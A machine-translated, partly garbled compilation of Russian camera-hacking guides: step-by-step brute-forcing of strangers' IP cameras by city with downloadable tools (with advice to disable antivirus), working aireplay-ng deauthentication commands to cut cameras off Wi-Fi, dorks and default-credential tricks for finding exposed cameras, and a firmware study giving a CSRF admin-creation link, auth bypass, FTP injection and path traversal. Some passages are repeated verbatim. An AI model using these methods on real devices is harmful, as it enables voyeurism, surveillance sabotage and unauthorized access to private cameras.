Yandex Dzen.

Switch by reference. We get to the authorization page. We come in using the data and voila received, we get to someone else

A friend before reading you go to my site and add to the bookmarks, the articles go faster

First we will understand what types of types of cameras are:

IP cameras are cameras to which you can connect via the Internet. (Local cameras are working with the Internet - these are the cameras to which it is impossible to connect via the Internet. They will not be involved in the Internet. (Work without the Internet)

Now I will show you and tell you how to find the IP cameras.

To begin with, we need the necessary software for bruta, check and viewing.

First we will need to download the archive. There all the necessary software for work. If you do not want to download my archive with the collection of programs, then on the way for finding the necessary programs!

Download the archive: DOWNLOAD

Kportscan.  -

IVMS-4200.  -

Hikka.  -

Attention! Before unpacking, turn off the antivirus and add KPORTSCAN to exceptions. So exactly on him the antivirus swears. No viruses 😈

Unpack the archive to any folder. And we meet 3 programs.

What do they make these three programs?

KPORTSCAN - Brute Camera
Hikka - IP camera check
IVMS-4200 - View IP cameras

What is Brut and Check?

Brutte (BRUTE) - the extraction of something
Check (Check) - checking something (in this case, checking using login and passwords)

At first we need to open the site.

There he is:

Enter the city there we want to hack on the cameras!

In my case, for example, it will be the Russian city "Tver"

Copy IP bands and open Kportscan. And insert the copied IP bands there.

In the list, choose "Russian Federation"

Next in "Port" write a value " 8000. "

And press the "Start" button

Attention! Before pressing the "Start" button, check with a screen like me so that you do not have any errors!

Switch by reference. We get to the authorization page. We come in using the data and voila received, we get to someone else

How did you verify your values ​​with my screen so that they match, boldly press the start button!

Well, now it remains to wait for the end of the check. When checking the Internet you will be loaded pretty much. So get ready for this test)

After completion, you will display the number of IP cameras found.

Close KPORTSCAN and open the file Results.txt

There will be found cameras. Copy all cameras found from file Results.txt and open the folder with the program called " Hikka. "

Open the file " Hosts. "And throw off the copied cameras there. Save and run the file" Start.Bat. "

Now we are waiting for a green string, it will mean that the camera is found!

An example of the cameras found:

As soon as Hikka found the camera, we go to install the program " IVMS-4200. "

By the way, I almost forgot when Hikka found the camera, in the PICS folder there will be pictures of the camera itself, and in the name of the chamber data.

As soon as installed the program " IVMS-4200. "Open.

If you have English, then press up "Help-> Language-> Russian

Next, open the "Device Management" tab and click on the "Add" button

We introduce any pseudonym.

Enter the address (example:

Enter a user and password

If you are confused, then check for me on the screen:

Switch by reference. We get to the authorization page. We come in using the data and voila received, we get to someone else

After entering the necessary data, click on the "Add" button

After the successful import of the camera, go to the "Main Curlee" tab

And we see that a new folder appeared with your pseudonym camera. We open the folder, and click on the camera 2 times with the left mouse button, or simply drag the camera a little right.

So that is all! What to do next you decide ..

Turn off video surveillance cameras in any Wi-Fi network.

Extremely useful information for those who are "shaking", and yes it will work it until the computer is shifting traffic, the connection will be restored as soon as you turn off.

What you need

To begin with, you will need a Kali Linux or another Linux distribution, such as Parrot Security or Blackarch, which can run AirePlay-NG. You can run them from a virtual machine using a USB flash drive or from a hard disk.

You will then need a Wi-Fi adapter that supports the injection of packets, which has a monitoring mode. You will need to scan the area around you to find a device that can be turned off from the network to be able to send packets pretending to packages sent from the point of access to which this device is connected.

Step 1. Update Kali

Before you start, make sure your system is fully updated. In Kali, a team with which you can do it, looks like this:


Make sure you have a goal and access rights using the AirePlay-NG tool. You can certainly scan any network that you want using Kismet, but the Aireplay-NG will directly perform a DDOS attack

Step 2. Select a weapon

The first step in choosing wireless purposes is the conduct of passive intelligence in a specific Wi-Fi network. To do this, you can use the program called Kismet, which performs a smart Wi-Fi analysis of signals passively and unnoticed. The advantage of this method is that simply being close to your goal, you can track wireless traffic in this area, and then resort the necessary information in order to find an interesting device.

An alternative to Kismet is ARP-SCAN, which can be configured in several ways to filter information about discovered networks. And although this tool works well, sometimes it may require more work to decipher the data obtained. Today in our article we will use Kismet.

Step 3. Switch the Wi-Fi adapter in monitoring mode

To start scanning a network using any tool, we need to enable our wireless network adapter to monitor mode. We can do it by typing the next command, provided that WLAN0 is the name of your wireless card. You can find out the name of your wireless card by running the IFConfig or IP A commands that will display available network interfaces.

Sudo Airmon-NG Start Wlan0

After starting this command, you can start iFconfig or IP A again to ensure your card is in monitoring mode. Now her name will be something like Wlan0mon.

Step 4. Seam Kismet on the network

After you turn on the monitoring mode, we can run Kismet by typing the following command:

Kismet -c Wlan0mon.

In this team, we indicate which network adapter should use Kismet, this is done through the -c flag (from the word Client) You can press TAB, then ENTER to close the console window and show the main screen.

Step 5. Using Kismet, find wireless security cameras

Now we can scroll into the list on all devices on the network and try to find something interesting. If you can't do this, then try enable additional parameters in the Preferences menu to see the source of the packages. You can access it through the "Kismet" menu.

As soon as Kismet earns, you can see the name of the manufacturer of any devices, and on this name it is to determine that the security chamber may be from the listed devices. Here we found a device that, according to Kismet, was made by Hangzhou. You can see that its MAC address - A4: 14: 37: XX: XX: XX.

We will dwell in more detail at that time, how MAC addresses are appointed. Since the first six digits and letters are assigned to a certain organization, then we can quickly find the name of the company, which makes such devices by the number A41437.

Taking the full name of the company (in this case, Hangzhou Hikvision Digital Technology), and **** it is in Google search, we will learn the line of its products. Lucky, this company just makes wireless video surveillance cameras.

Now we have three parts of our mosaic: the name and bssd Wi-Fi access points on which the camera is installed, the channel, which broadcasts its network signal, and the BSSID address of the camera itself. You can click Ctrl-C to close Kismet.

It is worth noting that if the camera begins to record or send data only when the movement sees, then the hacker will not see traffic from it until the camera starts the transmission.

It can be assumed that the streaming chamber connected to the DVR will stop functioning if it is turned off from the network. Having at its disposal all this information, you can use the AirePlay-NG to break the connection.

Step 6. Perform an attack deauthentification

To break the connection with the device that we aimed, we need to fix the wireless network on the channel, where we see running traffic. You can do this by typing the following command, suggesting that we want to block the network adapter on the 6th channel:

AirMon-NG Start Wlan0mon 6

Now that our card is configured to the correct channel, we can send a command that turns off the device detected by us. The team that we will use for this is formatted as follows:


Here is the breakdown of its components:

-0 Specifies the option of the attack in 0, deautentication attacks, which will send an authentication package to the device, which seems to be from the access point. The following 0 indicates the sending of a continuous stream of deautentic packets, but you can also select a fixed number.

-a will install the BSSID access point Wi-Fi network to which the device is connected.

-C will install the BSSID device that we want to remove from the network.

The final appearance of our team will be as follows:

AirePlay-NG -0 0 -a XX: XX: XX: XX: XX: XX -C A4: 14: 37: XX: XX: XX Wlan0mon

As soon as this command is running, it will block a Wi-Fi connection between two devices until you stop by pressing the CTRL-C key combination.

Article author Site

Subscribe to the canal

Remote access to webcam and surveillance cameras are the most visual hacking practice. It does not require special, allowing you to do with a browser and non-good manipulations. Thousands of digital eye worldwide will become available if you know how to find their IP addresses and vulnerabilities.


The article is a research nature. It is addressed to security specialists and those who are going to become. With its writing, public databases were used. Neither the editors nor the author are responsible for the unethical use of any information mentioned here.

With widespread eyes

Video surveillance is used mainly for protection, and therefore do not wait for cheerful pictures from the first jacket chamber. Maybe you will be lucky to quickly find HD-broadcast from an elite brothel, but it will be more often boring views of deserted warehouses and parking with VGA resolution. If there are people in the frame, they are mainly waiting in the lobby and fruit in a cafe. More interestingly to watch the operators and work of any robots themselves.

Real and formal observation
Real and formal observation

IP cameras and webcams are often confused, although these are fundamentally different devices. Network chamber, or IP camera, - self-sufficient observation. It is managed through the web interface and independently transfers the video stream over the network. In essence, this is a microcomputer with its OS based on Linux. Ethernet network interface (RJ-45) or Wi-Fi allows you to directly connect to an IP camera. Previously, branded client applications were used for this, but most modern cameras are managed through a browser from any device - at least from a computer, even from a smartphone. As a rule, IP cameras are permanently and remotely available. This is what the hackers use.

Robot in the library archive
Robot in the library archive

The webcam is a passive device that is managed locally from the computer (via a USB) or a laptop (if it is built) through the operating system driver. This driver can be two different types: universal (pre-installed in the OS and suitable for many cameras of different manufacturers) and written to order for a specific model. Hacker's task here is already different: do not connect to the webcam, but to intercept its video stream that it broadcasts through the driver. The webcam has no separate IP address and a built-in web server. Therefore, hacking a webcam always a consequence of a computer hacking to which it is connected. Let's postpone the theory and we will practic a little.

Glasses nn-nda?
Glasses nn-nda?

Hacking surveillance cameras

Hacking IP cameras does not mean that someone hosts on the computer from which the owner looks at their video stream. Just now he looks not alone. These are individual and fairly light goals, however, underwater stones on the way there is enough.


Peeping through the cameras may entail administrative and criminal punishment. Usually a fine is prescribed, but not everyone can easily get rid. Matthew Anderson served a year and a half per hacking webcams using Trojan. Repeating his feat was awarded for four years.

First, remote access to the selected camera can only be supported through some particular browser. One give fresh chrome or firefox, while others work only with old IE. Secondly, the video stream is broadcast on the Internet in different formats. Somewhere to view it, you will need to install the VLC plugin, other cameras will require Flash Player, and the third will not show anything without the old version of Java or your own plug-in.

Chinese politeness
Chinese politeness

Sometimes there are nontrivial solutions. For example, Raspberry PI is transformed into a video surveillance server with NGINX and broadcast video via RTMP.

Malinic camera
Malinic camera

According to the plan, the IP chamber is protected from the invasion of two secrets: its IP address and account password. In practice, IP addresses can hardly be called a secret. They are easily detected by standard addresses, besides, the chambers are equally responded to search robots requests. For example, in the following screenshot, it can be seen that the chamber owner disabled anonymous access to it and added Captcha to prevent automated attacks. However, direct link /INDEX.htm. You can change them without authorization.

Get access Contrary to settings
Get access Contrary to settings

Vulnerable surveillance cameras can be found via Google or another search engine using advanced requests. For example:

Inurl: "WVHTTP-01" inurl: "ViewerFrame? mode =" inurl: "videostream.cgi" inurl: "WebCapture" inurl: "snap.jpg" inurl: "snapshot.jpg" inurl: "video.mjpg" 
We find cameras through Google
We find cameras through Google

It is much more convenient to search for them through shodan. To begin with, you can limit the simple request. Netcam and then go to more advanced: Netcam City: Moscow , Netcam Country: RU , Webcamxp GEO: 55.45,37.37 , Linux Upnp Avtech and others. Read more about the use of this search engine read in the article "White Hat for Shodan".

We are looking for cameras in Shodan
We are looking for cameras in Shodan

Fine looking for cameras and Censys. The language of requests is a little more difficult for him, but it will not be very difficult to deal with him. For example, query 80.http.get.body: "DVR Web Client" will show the cameras connected to the IP video recorder, and Metadata.Manufacturer: "AXIS" will find camera production AXIS. We have already written about how to work with Censys - in the article "What can Censys know?".

We are looking for cameras in Censys
We are looking for cameras in Censys

Another chic search engine on the "Internet of Things" - Zoomeye. Cameras are available on request Device: Webcam. or Device: Media Device .

We are looking for cameras in Zoomeye
We are looking for cameras in Zoomeye

You can also search for in the old manner, tritely scanning IP addresses in search of a characteristic response from the camera. You can get a list of Aypishniki a certain city on this web service. There is also a port scanner in case you still have no own.

First of all, we are interested in ports 8000, 8080 and 8888, as they are often as default. Learn the default port number for a specific camera in its manual. Number almost never change. Naturally, on any port you can detect other services, so the search results will have to additionally filter.


Find out the model's model simply: Usually it is indicated on the title page of the web interface and in its settings.

Recognize the camera model and configure it
Recognize the camera model and configure it

When I spoke at the beginning of the article on the management of cameras through the "branded client application", I meant the program like IVMS 4xxx, which comes with Hikvision cameras. On the developer's website you can read the Russian-speaking manual to the program and the cameras. If you find such a camera, it will be most likely to stand the factory password, and the program will provide full access to it.

With passwords to surveillance cameras, it is even fun. On some password cameras simply no and authorization is missing completely. On others it is worth the default password, which is easy to find in the manual to the chamber. The website published a list of the most common logins and passwords installed on different camera models.

Admin / Admin, Open!
Admin / Admin, Open!

It often happens that the manufacturer has left a service entrance for service centers in the camera firmware. It remains open even after the chamber owner has changed the default password. In the manual, you can no longer read it, but you can find on thematic forums.

A huge problem is that in many cameras, the same GoaEad web server is used. It has several famous vulnerabilities that camera manufacturers are in no hurry to patch.

GoaEad, in particular, is subject to stack overflow, which can be called a simple HTTP GET request. The situation becomes more complicated by the fact that Chinese manufacturers modify Goahad in their firmware by adding new holes.

Purify, Milok!
Purify, Milok!

To date, more than a million IP cameras and IP video recorders of different manufacturers allow you to remotely access their settings without any authorization. The Python script that automates the attack on vulnerable devices is already laid out on GitHub. The problem was discovered in early 2017 with reversing DVR firmware made by Dahua Technology. A little later it turned out that it affects more than a thousand models of different manufacturers. They simply replicated each other's mistakes. The author promised to give a correction time and so far not to disclose all the details, but it is ready to share them privately by email with all security experts. If you have a CERTIFIED Ethical Hacker (Certified Ethical Hacker) certificate or similar - you can try.

Add brightness!
Add brightness!

In the code of other firmware there are such lamps as conditional transition curves. Such a camera opens access if you enter the wrong password or simply press the "Cancel" button several times. During our study, more than a dozen such cameras were caught. So, if you are tired of sorting out default passwords, try to click Cancel - there is a chance to suddenly access.

The middle and high chambers are equipped with swivel fasteners. Hacking such, you can change the angle and fully inspect everything around. It is especially interesting to play the chamber pulling when, in addition to you, she is trying to manage someone else. In general, the attacker receives full camera control directly from his browser, simply by contacting the desired address.

Camera control
Camera control

When they talk about thousands of vulnerable cameras, I want to disassemble at least one. I propose to start with the popular Foscam manufacturer. Do you remember, I spoke about the service entrances? So here the cameras Foscam and many others they are. In addition to the built-in Admin account, the password to which is recommended to set when the camera is first turned on, there is another account - Operator. . His default password is empty, and it rarely someone can change it.

Logmark as an operator and add new accounts
Logmark as an operator and add new accounts

In addition, Foscam cameras are very recognizable addresses due to template registration. In general, it looks like where the first two XX - Latin letters, and subsequent four - sequence number in decimal format.

If the camera is connected to the IP video recorder, you can not only remotely observe real-time, but also to view the previous records.

Watch backup
Watch backup

How does the motion detector

Professional surveillance cameras are equipped with an additional sensor - motion detector, which works even in complete darkness thanks to the IR receiver. It is more interesting to the permanent illumination constantly turned on, since it does not demask the camera and allows it to lead a hidden observation. People are always glowing in the near IR range (at least live). Once the sensor fixes the movement, the controller includes recording. If the photocell signals a low light, the backlight is additionally turned on. And exactly at the time of recording, when it is too late to close from the lens.

Cheap cameras are simpler. They do not have a separate motion sensor, and instead it uses a comparison of frames from the webcam itself. If the picture is different from the previous one, it means that something has changed in the frame and it is necessary to write it. If the movement is not fixed, then the frame series is simply deleted. It saves space, traffic and time on the subsequent rewinding video. Most motion detectors are configured. You can set the trigger threshold so as not to log any movement in front of the camera, and configure additional alerts. For example, send SMS and the last photo from the camera immediately to the smartphone.

Customize camera motion detector
Customize camera motion detector

The program motion detector is greatly inferior to the hardware and often becomes the cause of the incident. In the course of his research, I came across two cameras that were continuously sent by Alerts and recorded gigabytes of the "compromant". All alarms turned out to be false. The first chamber was installed outside some warehouse. She threw over a web, who was trembling in the wind and reduced the motion detector. The second camera was located in the office opposite the flight flashes. In both cases, the trigger threshold was too low.

Breaking webcam

Webcams that work through a universal driver are often called UVC-compatible (from USB Video Class - UVC). Hack the UVC camera is simpler because it uses a standard and well-documented protocol. However, in any case, to access a webcam, the attacker will have to first get control over the computer to which it is connected.

Technically access to webcams on Windows computers of any version and discharge through the camera driver, DirectDraw filters and VFW codecs. However, the novice hacker is not required to delve into all these details if he is not going to write an advanced backdoor. It is enough to take any "rat" (RAT - Remote Admin Tool) and slightly modify it. Remote administration tools today is just a lot. In addition to selected backdors with VX Heaven, there are also completely legal utilities, like AMMYY ADMIN, LITEMANAGER, LUMINOSITYLINK, Team Viewer or Radmin. All that optionally needs to be changed in them is to configure automatic reception of requests for remote connection and folding the main window. Further case for social engineering methods.

Network girl
Network girl

The code-modified rat is loaded by a victim along a phishing link or is crawling onto its computer itself through the first detected hole. On how to automate this process, see the article "GOPHISH - FREAMVORK FOR Fishing". By the way, be careful: Most references to "programs for hacking cameras" themselves phishing themselves and can lead you to the download of Malvari.

Private user has most of the time the webcam is inactive. Usually, its inclusion warns the LED, but even with such alert you can perform hidden observation. As it turned out, a webcam activity indication can be disabled even if the power of the LED and CMOS matrix is ​​physically interconnected. It has already been done with ISIGHT webcams built into MacBook. Broker and Chekoui researchers from John Hopkins have written the iSeeyou utility, which runs from a simple user and, exploiting the vulnerability of the CYPRESS controller, replaces its firmware. After starting the victim of the iSeeyou, the attacker gets the ability to turn on the camera without burning its indicator activity.

Vulnerabilities are regularly found in other microcontrollers. PREVX specialist collected a whole collection of such exploits and showed examples of their use. Almost all the vulnerability found treated 0day, but among them were well-known, which manufacturers were simply not going to eliminate.

The ways to deliver the exploits becomes more and more, and they are increasingly difficult to catch them. Antiviruses often grain in front of the modified PDF files, have preset restrictions on checking large files and cannot check the encrypted components of Malvari. Moreover, polymorphism or constant combat load recoupment has become the norm, therefore the signature analysis has long departed to the background. Implement a Trojan, which opens remote access to the webcam, today has become exceptionally simple. This is one of the popular fun among trolls and script kiddies.

Turn a webcam in the observation chamber

Any webcam can be turned into a semblance of an IP camera if you install a video surveillance server on the device connected to it. On computers, many use old WebcamXP for these purposes, a little more new Webcam 7 and similar programs.

For smartphones there is a similar software - for example, Salient Eye. This program can save video to cloud hosting, freeing the local memory of the smartphone. However, there are enough holes in such programs and OS themselves, so the webcam managed to crack themselves is often not more difficult than the IP cameras with a hole firmware.

Webcam 7 shows video without authorization
Webcam 7 shows video without authorization

Smartphone as a means of observation

Recently, old smartphones and tablets are often adjusted for home video surveillance. Most often they put Android Webcam Server - a simple application that broadcasts the video stream with the built-in camera on the Internet. It accepts requests to port 8080 and opens the control panel on the page with the speaker name /remote.html . After hitting it, you can change the camera settings and watch the image right in the browser window (with or without sound).

Usually such smartphones show rather dull pictures. It is hardly interesting for you to look at the sleeping dog or on the car parked near the house. However, Android Webcam Server and similar applications can be used otherwise. In addition to the rear cameras, smartphones have both frontal. Why don't we include it? Then we will see the other side of the owner of the smartphone.

Switch smartphone cameras
Switch smartphone cameras

Protection against peeping

The first thing that comes to the mind is most people after a demonstration of a light hacking cameras is to stick them with a tape. Webcam owners with a curtain believe that their peeping problem does not concern, and in vain. It is also abandoned, because, except the lens, the cameras have a microphone.

Antivirus developers and other software protection complexes use confusion in terminology to promote their products. They frighten up camera hack statistics (which is really impressive if you enable IP cameras), and they themselves offer a solution to control access to webcams, and technically limited.

The protection of IP cameras can be enhanced by simple means: updating the firmware by changing the password, port and disable default accounts, as well as turning on the filtering of IP addresses. However, this is not enough. Many firmware have confused errors that allow you to access without any authorization - for example, by the standard address of the web page with LiveView or the settings panel. When you find another hole firmware, I want to update it remotely!

Help update the firmware vulnerable camera
Help update the firmware vulnerable camera

Hacking a webcam - another thing. It is always the top of the iceberg. Usually by the time the attacker received access to it, he has already managed to cut down on local disks, steal the accounts for all accounts or make a computer part of the botnet.

The same Kaspersky Internet Security prevents unauthorized access to only the video stream of the webcam. It does not hinder the hakwar to change its settings or turn on the microphone. The list of models protected by them is officially limited to Microsoft and Logitech webcam. Therefore, the "Web Camera Protection" feature is perceived only as an addition.

Peeping sites

A separate problem is attacks associated with the implementation of access control to the camera in browsers. Many sites offer communication services using the camera, so the access requests to it and its built-in microphone pop up in the browser ten times a day. The feature here is that the site can use the script that opens Pop-Under (an additional window in the background). This daughter window is given by parental permits. When you close the main page, the microphone remains on the background. Because of this, a script is possible, in which the user thinks that he finished the conversation, and in fact, the interlocutor (or someone else) continues to hear it.

In most browsers, permission is kept constantly, so the next time you visit the site can see and hear without warning. It is worth more often to check the permissions of the webcam and its microphone for different sites. In Google Chrome, this can be done on the settings page. Chrome: // Settings / ContentExceptions # Media-Stream . In the old versions of Firefox, similar settings were on the page About: permissions and in the new they are set separately for each site when clicking on the icon (I) Left in the address bar. Look more in the Mozilla documentation.

How many of you paid attention to how much appeared on the streets of surveillance cameras now? Just walking from home to work recently I counted them almost half hundreds. And as much as they safely asked themselves the question I .. It turns out not so that very ... After spending a few days of studying the issue, we have prepared the material that will tell how to hack the webcam video surveillance of many modern models.

In the same way, you can hack and access other surveillance cameras, network drives (NAS), printers, web cameras and any other network equipment.

So, my task was to choose such a manufacturer, who, on the one hand, has long been present on the Russian market, on the other, has not yet attracted the attention of security specialists. My choice fell on the Korean company Microdigital. which produces IP cameras.

The company's website promises us a wide range: "Over 30 models of recorders, over 150 models of the camcorder." Excellent!

The company exists on the market (including Russian) for more than twelve years, which means that its products are distributed. It turned out that in 2011 a contract was concluded for equipping more than 30 thousand Russian bus cameras of this company.

First of all, I was interested in the devices of the N series, they are quite advanced, but at the same time they have not yet become an object of testing someone from researchers. It's time to fix it! I chose the MDC-N4090W model, which is designed to use indoors. Detailed information about the device can be learned on the manufacturer's website.

Pictures on request MDC-N4090W
Pictures on request MDC-N4090W

Studying the chamber

Start any iron study is best with studying the available documentation.

Open the PDF received on the Microdigital website, and find out that the camera has a web interface with Root users (ROOT password) and Anonymous.

Well, since we are on the company's website, grab the actual firmware for the camera. It did not have to search for a long time, it is available in the appropriate section.

Not a fact, however, that the firmware contains all the information necessary for testing, so it will be the meaning of it, only if there is no full-fledged administrator access to the device console or when you need to study the update. Therefore, we will not spend time and return to the firmware later.

Preparation of webcams for testing

We will proceed to the study of the hardware component. To do this, disassemble the device (nothing complicated, four screws around the perimeter) and get a printed circuit board.

We also see the following:

  • memory S34ML01G100TF100;
  • chip DM368Zce;
  • Interfaces: Four Pins UART, USB, MicroSD, Ethernet.

Pins marked as Ble, I do not consider, as it is likely to contact the Bluetooth module. This is not interested in us.

The S34ML01G100TF100 module is non-volatile Nand-memory in the TSOP-48 case. Datasheet easily googles. From it we learn more about the type of body (Nand08) and the size of the repository - 128 MB.

For further work, you will need to make a data backup so that in the case of "okimpicing" the camera could be returned to the original state. For this, the PROMAN TL86 or TL866 programmer with the Nand08 → DIP48 adapter is ideal for this.

The contents of flash memory will be kept in our working directory. Like the firmware, it will be necessary to return to it only if it does not come to the administrator console.

Pictures on request TL86
Pictures on request TL86

For the DM368Zce chip, also did not compile problems to come together documentation (PDF). It turns out that the chip architecture is ARM. In addition, you can get it from the documentation, but it does not need it.

Let's go through interfaces. From the documentation it is obvious that USB and MicroSD are needed mainly to connect external media to the device and use them as storage. For completeness, you can connect Facedancer21 to the USB-phase device and using the UMAP2Scan utility to get a list of supported devices.

Unfortunately, the camera does not support any of the devices known to us.

How about UART? Here it is necessary to determine what each PIN is responsible and what the data transfer rate is. To do this, use the Saleae Logic logical analyzer. For convenience, I connected through the wiring, which connects the device and infrared light bulbs.

Prix ​​pins for convenience.

Before turning on the logical analyzer, we connect the ground to the GND interface to connect to the BLE connection.

Now turn on the logical analyzer and the device itself and see what will come of it.

After turning on the device on Pine number 3 (in the program, the countdown comes from scratch and numerical PIN as 2) Binary data are transmitted. This UART interface PIN is responsible for data transmission (TX). After viewing the length of one bit, we obtain the current transfer rate - 115,200 bits per second. With the correct settings, we can even see part of the text.

Pina at number 1 is a constant voltage of 3 V - therefore, it is designed to power. PIN Number 4 is associated with a GND interface pin to connect the BLE module. So, this pin is also "earth". And the last PIN is left at number 2, it is responsible for receiving bytes (Rx). Now we have all information to communicate with the camera by UART. To connect, I will use Arduino Uno in the TTL adapter mode.

We start monitoring the UART port and get the following.

When the device starts, the U-Boot system bootloader is loaded first. Unfortunately, at the level of loading PIN TX is disconnected in the camera settings, so we can only observe debug output. After some time, the main system is loaded, allowing you to enter a login and password to access the administrator console. Steam root / root (similar to that used for web admin and is indicated in the documentation) perfectly approached.

Having received a console, we can explore all working services. But do not forget that we have another unexplored interface - Ethernet. To study, it will be necessary to prepare a traffic monitoring system. Moreover, it is important to track the first network connection.

We must start to intercept traffic at once, since some devices are started to download updates when you first connect. It is not a fact that in the following times it will get intercepted communications.

To intercept traffic, I will use the Lan Tap Pro device.

We, however, do not detect any activity connected with updates. This exploration is over, and we are fully prepared for the search for vulnerabilities!

Network part

We scan the ports of the NMAP utility and get a list of open ports.

Let's go briefly on the services available to us.


When connected, the service requests login and password. Anonymous input is disabled. But then the option root / root came!

Now we can enter any directory and got a convenient way to throw files to a remote host.


When connected via Telnet, again, the username and password of one of the real accounts are required and the root / root pair is already fits. Please note that we do not need a UART console now, since all the same can be done remotely by Telnet.


To connect to the RTSP, again you need to log in as root / root. Reference for connection takes RTSP: // root: [email protected]: 554 / Primary .


After examining the device of the camera's web server, I made this scheme here.

The server contains scripts on PHP and CGI applications that communicate with executable files from the directory / USR / Local / IPSCA / (mainly communication comes with MainProc ). SQLite 3 database is used to store all settings.

From her, we will start looking for vulnerabilities. The database is stored in /usr/local/ipsca/mipsca.db. . It lies everything - from the logs of the system before the settings of the automatic download of camera records to the remote server. The database structure is visible on the scree below.

My attention attracted the user table. She is responsible for working with user data: login, password, privileges.

The user password is stored in the Password column in not Encrypted form, that is, having access to the database, the attacker can get a password of the administrator and test it on other available services.

Go to PHP scripts. In web directory / root / httpd / hdtocs / web Lies three scripts: Download.php. , login.php. , Upload.php. .

File login.php. Not particularly interesting, since PHP is used only to configure the ActiveX component, which is necessary for browser add-ons, which are striking the video on the site.

File Download.php. Accepts the name of the file name for download, checks its extension and, if such a file is found in the folder UpdownLoad. Sends in response to its contents.

The script does not check the file name, so if someone suddenly decides to put the executable script in this directory, then its contents will jump on request (pay attention to the variable $ FILE_TYPE which will be empty in the case of an unknown expansion).

Last file - Upload.php. Also, it was not without bugs: it has the opportunity to send not only files with an extension from a white list ( .dat and .dat. ), but also with empty expansion.

Vaitlist extensions is set as follows.

Now, if the extension value is not empty, check is carried out for the extension in the array, which is derived from $ allowext . The comma is used as a separator.

But if the extension is empty, the execution will not reach this condition and check is not executed. However, for operation, this bug is useless.

But the next randomly found bug of this script should be regarded as a vulnerability: there is no check for the length of the file name. It would seem that a very serious problem, but at the beginning of the program, the script is launched on Bash.

It clears the directory UpdownLoad. From previously downloaded files there, and in the Bash interpreter, which is included in BusyBox, it is limited to the length of the file name in 256 characters. It turns out that the script will not be able to delete files whose names are longer than this value.

So how are u Upload.php. There is no authorization, any user can download how many files with the name longer than 256 characters, and this will fill the entire memory of the device. In other words, DENIAL OF SERVICE .

An example of downloading a file.

And receiving a list of files in the directory / UpdownLoad / Through the bash console.

On this we can complete the study of the scripts on PHP and move on to the largest part of the study - CGI applications.

CGI applications on the IP cameras respond almost for all actions in the administrator's web panel, starting with authorization and ending with the device update.

I share the job description how to hack web chamber To test the "naked eye" (vulnerability, to find which you do not need to reverse executable files) and the actual reverse of these most biners.

When testing the "naked eye" there were two vulnerabilities. The first allows you to carry out the attacks of counterfeit queries (that is, CSRF). Its essence lies in the fact that you can apply social engineering and make the administrator switch to a malicious link. This makes it possible to perform almost any command from the admin interface. For example, you can make this link:

/ WebParam? User & Action = Set & Param = Add & id = Tester & Pass = CGFZC3DVCMQ = & authority = 0 & t = 1552491782708 

It will create a user Tester with password Password.

When I studied traffic at Burp Suite, I could not find a server response for a long time, where the browser is sent Cookie with authorization data ( Username, Auth and Password ). It turned out that I was looking for in vain: these data are set on the client side through the code on JavaScript in the file /inc/js/ui.js. .

That is, the browser first makes a request to check the login and password and, if the result is positive, saves the values ​​of the login, password and privileges in the appropriate cookies. And then these cookies are used when sending command requests, for example, when creating a new user.

This also appears the second vulnerability that makes it possible to understand how to crack the web chamber: Even if we do not send a Password Cookie, the server will still successfully process our request!

That is, it is enough to know the admin login (which is the default - root) to bypass authorization and make any challenges available to the administrator in the camera's administrative web console! And we found it, without even studying the application code. Let's see what will be in the code itself.

Studying binary applications

To explore executable files, some preparations were required. Namely:

  • Installing a statically compiled GDB debugger from public repositories on GitHub;
  • Installing the MicroSD card with the VFAT file system (which allows you to get an additional place).

The process of studying compiled applications is like this.

  1. Studying an application in Ida Pro.
  2. If necessary, debugging applications in GDB on the camera itself via Telnet. By the way, since the application is multi-threaded, I had to check the desired process ID every time to interact with a specific stream (the thread is created before the request processing).
  3. Writing a PROOF-OF-CONCEPT to demonstrate vulnerability.

Almost all command web requests went to the address / WebParams. . Having studied the HTTPD settings that are stored in the file /usr/local/httpd/conf/httpd.conf. , define that all requests for / WebParam redirected to executable FCGI file on the way /usr/local/httpd/fcgi/webparams.fcgi. .

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

This is an executable file for 32-bit ARM. I decided to concentrate on it.

Arbitrary FTP commands

The camera can send entries to a remote network FTP server. To configure the connection configuration there is a separate web form.

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

Next, you can click on the TEST button and check the connection. The function will be caused to 0xaEB0. . For convenience, we will study the pseudocode function obtained using Hex-Rays Decompiler.

  1. Creating a connection.

    And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!
  2. Authorization on the FTP server.

  3. Change the current directory with the value transmitted by the argument.

  4. Creating a temporary file.

The security problem was found already on the third paragraph. Function FTP_CWD. shifting 0xa9f0. does not check the presence in the string path of incorrect characters, such as the transfer of the line.

This allows you to send arbitrary FTP commands - Add to add bytes \ r \ n In the value of the directory for downloading files. So we found SSRF.

For example, you can make a request to the FTP server of the camera and add a command to it that creates a directory / TMP / 123 (Get-variable UploadPath. Just responsible for the path to the required directory).

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

Go to B. / TMP / On the camera and see the created folder 123. .

Path Traversal and checking file availability

The following web server is the feature of the web server - clock synchronization via the NTP protocol.

The change in the parameters corresponds to the shift function 0x12564. . We will not go into detail in the principle of its work, we only pay attention to the variable Tz. (Time Zone).

  1. First 32 bytes get-parameter Tz. Entered into the variable get_tz_32b. .

  2. The value is concaten by the way to the directory where the time zone settings are stored, and the presence of such a directory (or file) is checked in the device file system.

  3. If successful then, different actions go to the execution of which you need time. For example, requests to the database.

If you combine all three points, it will turn out that we can not only manipulate the full address of the directory (Path Traversal), but also to define the answer from the server in the file system. To make sure that, send a request that will check if the file exists / etc / passwd .

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

And let's see what will happen if there is no file.

SQL injection in webcam

Go to more serious vulnerabilities. Camera configs are stored in the SQLite 3 database, and almost all actions on the web server lead to interaction with it. So, it turned out that almost all requests to the database with string parameters can pass with incorrectly formatted input. And this, as you could guess, SQL Injection! For example how to hack web Camera We will analyze one of the vulnerable forms - the form of editing the DNS settings.

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

